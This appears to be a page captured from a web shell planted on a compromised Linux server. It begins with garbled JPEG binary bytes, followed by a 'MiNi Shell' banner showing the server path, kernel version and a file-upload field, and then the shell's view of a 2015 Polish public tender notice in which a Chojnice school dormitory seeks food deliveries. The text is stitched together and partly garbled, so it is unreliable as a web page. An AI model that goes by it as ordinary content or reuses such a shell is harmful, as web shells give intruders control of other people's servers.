JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151116/307250-N-2015.html

<p class="kh_header"><b>Chojnice: dostawy sukcesywne artykułów żywnościowych z podziałem na części</b><br>
<b>Numer ogłoszenia: 307250 - 2015; data zamieszczenia: 16.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Bursa dla Młodzieży Szkolnej , ul. Świętopełka 1, 89-620 Chojnice, woj. pomorskie, tel. 0-52 3972996, faks 0-52 3972996.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bursa.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy sukcesywne artykułów żywnościowych z podziałem na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy sukcesywne artykułów żywnościowych, zgodnie z poniższym podziałem na części zwanych dalej pakietami:
Pakiet I - dostawa mięsa i wędlin, których ilość i asortyment zostały określone w załączniku nr 1 do SIWZ,Wspólny słownik zamówień (CPV): 15.10.00.00-9
Pakiet II  - dostawa mleka i artykułów mleczarskich, których ilość i asortyment zostały określone w załączniku nr 2 do SIWZ,
Wspólny słownik zamówień (CPV): 15.50.00.00-3
Pakiet III -  dostawa pieczywa, panierki i ciasta, których ilość i asortyment zostały określone w załączniku nr 3 do SIWZ,
Wspólny słownik zamówień (CPV): 15.81.00.00-9
Pakiet IV - dostawa warzyw i owoców, których ilość i asortyment zostały określone w załączniku nr 4 do SIWZ,
Wspólny słownik zamówień (CPV): 03.22.00.00-9
Pakiet V - dostawa ryb i artykułów mrożonych, których ilość i asortyment zostały określone w załączniku nr 5 do SIWZ,
Wspólny słownik zamówień (CPV): 15.22.00.00-6, 15.20.00.00-0, 15.89.60.00-5
Pakiet VI - dostawa artykułów spożywczych, których ilość i asortyment zostały określone w załączniku nr 6 do SIWZ,
Wspólny słownik zamówień (CPV): 15.80.00.00-6
Pakiet VII - dostawa ziemniaków jadalnych, których ilość i została określona w załączniku nr 7 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1
Pakiet VIII - dostawa ziemniaków jadalnych których ilość została określona w załączniku nr 8 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1
Pakiet IX  - dostawa ziemniaków jadalnych, których ilość została określona w załączniku nr 9 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1
Pakiet X - dostawa ziemniaków jadalnych, których ilość została określona w załączniku nr 10 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.81.00.00-9, 03.22.00.00-9, 03.21.21.00-1, 15.10.00.00-9, 15.22.00.00-6, 15.20.00.00-0, 15.89.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uzna się za spełniony jeżeli Wykonawca wykażę, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał lub wykonuje co najmniej  1 dostawę w zakresie realizacji odpowiadających swoim rodzajem przedmiotowi zamówienia o wartości nie mniejszej niż
Pakiet I - 20 000,00 PLN
Pakiet II - 20 000,00 PLN
Pakiet III - 20 000,00 PLN
Pakiet IV - 20 000,00 PLN
Pakiet V - 20 000,00 PLN
Pakiet VI - 20 000,00 PLN
Pakiet VII - 5 000,00 PLN
Pakiet VIII - 5 000,00 PLN
Pakiet IX - 5 000,00 PLN
Pakiet X - 5 000,00 PLN
 każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bursa.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Bursa dla Młodzieży Szkolnej ul. Świętopełka 1 89-620 Chojnice p. 101 sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2015 godzina 08:30, miejsce: Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach ul. Świętopełka 1 89-620 Chojnice p.101 sekratariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	PRZEDMIOT ZAMÓWIENIA	J.M.	Ilość
 	 	 	 
1	2	3	4
1	baleron gotowany	kg	5
2	kiełbasa biała parzona	kg	30
3	kiełbasa jałowcowa	kg	5
4	kiełbasa krakowska parzona	kg	20
5	kiełbasa krakowska sucha
min 100g mięsa na 100g gotowego produktu	kg	60
6	kiełbasa zwyczajna	kg	100
7	szynka w galarecie	kg	5
8	metka łososiowa	kg	45
9	ogonówka  parzona	kg	60
10	parówki cienkie
zawartość mięsa min 80%	kg	120
11	pasztet pieczony 
zawartość mięsa min 30%	kg	20
12	pasztetowa wieprzowa 
mięso wieprzowe min 30%	kg	30
13	pasztet z przyprawami	kg	25
14	pieczeń kanapkowa	kg	20
15	piwna	kg	40
16	polędwica sopocka	kg	90
17	serdelki wieprzowe
zawart. mięsa min. 40%	kg	30
18	szynka wiejska	kg	50
19	szynka gotowana w siatce	kg	60
20	szynka konserwowa z kurczaka	kg	45
21	szynka cygańska	kg	55
22	łopatka z przyprawami	kg	50
23	szynkówka	kg	65
24	szynkówka wieprzowa
zawart. mięsa min 70%	kg	20
25	szynkowa z indyka	kg	60
26	szynkówka drobiowa	kg	35
27	kurczak gotowany
zawart. Mięsa min 85%	kg	20
28	tatrzańska
min. 65% mięsa	kg	20
29	tatrzańska 
min.90% mięsa	 	20
30	szynka konserwowa	kg	50
31	schab w przyprawach	kg	60
32	salami	kg	30
33	salami w przyprawach	kg	20
34	żywiecka
min. 65% mięsa	kg	40
35	żywiecka
min 100g mięsa na 100g gotowego produktu	 	20
36	pierś z indyka wędzona	kg	60
37	filet wędzony z indyka	kg	30
38	szynka delikatna 
z fileta zawart. mięsa min 85%	kg	35
39	 schab wieprzowy z/k	kg	30
40	 schab wieprzowy b/k	kg	500
41	 karkówka wiep. z/k	kg	20
42	 karkówka wiep. b/k	kg	260
43	 łopatka wieprzowa b/k	kg	200
44	mięso wieprzowe b/k 
szynka myszka  	kg	200
45	 wołowina extra	kg	10
46	 wątroba wieprzowa	kg	5
47	łopatka mielona	kg	400
48	 kości 	kg	10
49	 boczek surowy	kg	60
50	 boczek wędzony paski	kg	160
51	 kurczaki świeże	kg	220
52	 filety z kurczaka-piersi	kg	800
53	 pałki z kurczaka	kg	40
54	udka z kurczaka	kg	300
55	 porcje rosołowe	kg	300
56	filet z indyka piersi	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mleka i artykułów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	PRZEDMIOT ZAMÓWIENIA	J.M.	ILOŚĆ
 	 	 	 
1	2	3	4
1	Jogurt z kawałkami owoców 150g	szt	200,00
2	Jogurt owocowy 150g	szt	200,00
3	Jogurt naturalny 150g	szt	600,00
4	Masło śmietankowe
zawartość tłuszczu
 min 82% tłuszczu 200g	szt	1 500,00
5	Mleko UHT
o zawrt. tłuszczu  2%	litr	7 200,00
6	Ser żółty mazdamer
zawartość tłuszczu
w suchej masie min 40%	kg	70,00
7	Ser żółty  Tylżycki
zawartość tłuszczu 
w suchej masie min 40%	kg	40,00
8	Ser żółty twardy Edamski
zawartość tłuszczu
w suchej masie min 40%	kg	40,00
9	Ser żółty twardy Królewski
zawartość tłuszczu
w suchej masie min 40%	kg	70,00
10	Ser żółty twardy Salami
zawartość tłuszczu
w suchej masie min 40%	kg	350,00
11	Ser żółty twardy dziurawiec
zawartość tłuszczu
w suchej masie min 40%	kg	50,00
12	Ser żółty twardy Gouda
zawartość tłuszczu
w suchej masie min 40%	kg	200,00
13	Ser topiony (kostka)
skład: ser dojrzewający min 27%	kg	120,00
14	ser topiony zegar 200g	szt	300,00
15	ser topiony plastry 150g	szt	400,00
16	ser twarogowy plastry 150g	szt	250,00
17	Ser twardy wędzony	kg	50,00
18	Serek kanapkowy
 twarogowy z dodatkami 150g	szt	150,00
19	Serek homogenizowany 150g	szt	200,00
20	Serek twarożkowy 200g	szt	300,00
21	Śmietanka 18% słodka 500ml	szt	700,00
22	Śmietana jogurtowa 200ml
zawartość tłuszczu max 10%	szt	500,00
23	Śmietana 30% słodka 500ml 	szt	25,00
24	Twarożek grani 200g	szt	200,00
25	Twaróg półtłusty kostka 200g	szt	1 900,00
26	Wyrób seropodobny
dobrze topiący się	kg	30,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa pieczywa panierki i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	PRZEDMIOT ZAMÓWIENIA	Zapotrzebowanie
roczne w kg
 	 	 
 	 	 
1	Chleb (krojony)	600
2	Chleb wiejski (krojony)	800
3	Chleb z dodatkami 
(krojony)
Typu: wieloziarnisty, 7 ziaren, z soją, z ziołami, krajan	600
4	Chleb słonecznikowy
(krojony)	1000
5	Chleb z pełnego ziarna
(krojony)
Typu: razowy, graham	350
6	Bułka podłużna
do zapiekanek 	144
7	Bułka wrocławska	1750
8	Bułka grahamka	250
9	Drożdżówka - sznek	8
10	Pączek	7
11	Panierka	165.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	PRZEDMIOT 
ZAMÓWIENIA	J.M.	ILOŚĆ
 	 	 	 
1	2	3	4
1	banany	kg	400
2	brokuły	kg	40
3	brukiew	kg	70
4	brzoskwinie	kg	200
5	buraki	kg	400
6	cebula	kg	300
7	cytryna	kg	50
8	fasola szparagowa	kg	20
9	gruszki	kg	400
10	jabłka	kg	1300
11	kalafior	szt	50
12	kapusta czerwona	kg	220
13	kapusta kiszona	kg	300
14	kapusta pekińska	kg	300
15	Kapusta  świeża	kg	600
16	kapusta biała-młoda 	szt	80
17	kapusta włoska	kg	50
18	kiwi	kg	400
19	koper	pęczek	350
20	koper	kg	10
21	mandarynka	kg	500
22	marchew płukana	kg	1100
23	nektarynki	kg	200
24	ogórek kiszony	kg	300
25	ogórek świeży	kg	700
26	papryka świeża	kg	240
27	pieczarki	kg	450
28	pietruszka korzeń płukana	kg	130
29	pietruszka nać	pęczek	200
30	pomarańcz	kg	450
31	pomidor	kg	650
32	por	kg	130
33	Por młody	szt	100
34	rzodkiewka	pęczek	250
35	rzodkiew biała	kg	100
36	sałata	szt	600
37	szczypior	pęczki	50
38	seler płukany	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa ryb i artykułów mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	PRZEDMIOT ZAMÓWIENIA	J.M.	 	ILOŚĆ
 	 	 	 	 
1	2	3	 	4
1	makrela wędzona - tuszki	kg	1kg	45
2	delfinki - mrożone	kg	1kg	20
3	kotlet rybny - mrożony	kg	1kg	60
4	panga mrożona	kg	1kg	50
5	kostka z mintaja	kg	1kg	100
6	kostka z mintaja panierowana	kg	1kg	40
7	kostka z morszczuka	kg	1kg	60
8	tilapia filet - glazura min 15%	kg	1kg	80
9	dorsz czerniak - filet (szaterpak)	kg	1kg	50
10	miruna ze skórą - filet (szaterpak)	kg	1kg	150
11	sałatka pik. z makreli EO 	szt	125g	400
12	śledź Bismarck	kg	1kg	60
13	śledź Matyjas	kg	1kg	15
14	śledź - filet w pomidorze	szt	170g	40
15	kalafior różyczki
gatunek I mrożony	kg	2,5kg	200
16	brokuły różyczki
gatunek I mrożone	kg	2,5kg	150
17	mieszanka warzywna - leczo
gatunek I mrożona	szt	450g	50
18	mieszanka kompotowa
gatunek I mrożona	szt	450g	100
19	miesznka warzywna - CHIŃSKA
gatunek I mrożona	kg	2,5kg	20
20	wiśnie b/p
gatunek I mrożone 	szt	450g	80
21	brukselka
gatunek I mrożona	kg	2,5kg	150
22	marchew mini
gatunek I mrożona	kg	2,5kg	120
23	groszek zielony
gatunek I mrożony	kg	2,5kg	120
24	fasolka szparagowa żółta
gatunek I mrożona	kg	2,5kg	150
25	kukurydza
 gatunek I mrożona	kg	2,5kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.20.00.00-0, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	PRZEDMIOT ZAMÓWIENIA	J.M.	 	Ilość
 	 	 	 	
1	2	3	 	4
1	Ananasy konserwowe plastry	szt	565g	20
2	Batonik toffi w czekoladzie	szt	45g	200
3	Batonik z orzeszkami w czekoladzie	szt	50g	200
4	Budyń	szt	65g	30
5	Chrzan tarty	szt	200g	15
6	Ciastka kruche różne kształty i smaki	kg	1kg	10
7	Cukier biały kryształ	kg	1kg	300
8	Cukier puder	szt	500g	15
9	Cukier waniliowy	szt	16g	200
10	Cukierki czekoladowe z nadzieniem
 różne smaki	kg	1kg	25
11	Cukierki owocowe różne smaki	kg	1kg	5
12	Cukierki toffi różne smaki	kg	1kg	5
13	Cynamon	szt	15g	20
14	Czekolada gorzka
Skład:masa kakaowa minimum 45%	szt	100g	10
15	Czekolada z dodatkami
Skład: masa kakaowa minimum 30%,
 masa mleczna minimum 15%	szt	100g	150
16	Czosnek granulowany	szt	25g	50
17	Drożdże	szt	100g	20
18	Dżem brzoskwiniowy 
100% z owoców, słodzony sokiem
zagęszczany pektynami	szt	280g	200
19	Dżem czarna porzeczka 
100% z owoców, słodzony sokiem
zagęszczany pektynami	szt	280g	200
20	Dżem malinowy
100% z owoców, słodzony sokiem
zagęszczany pektynami	szt	280g	200
21	Dżem truskawkowy 
100% z owoców, słodzony sokiem
zagęszczany pektynami	szt	280g	200
22	Dżem wiśniowy 
100% z owoców, słodzony sokiem
zagęszczany pektynami	szt	280g	200
23	Fasola sucha	szt	500g	130
24	Fasolka konserwowa czerwona	szt	400g	20
25	Fasolka konserwowa w słoiku	szt	900ml po
odcieku
510g	10
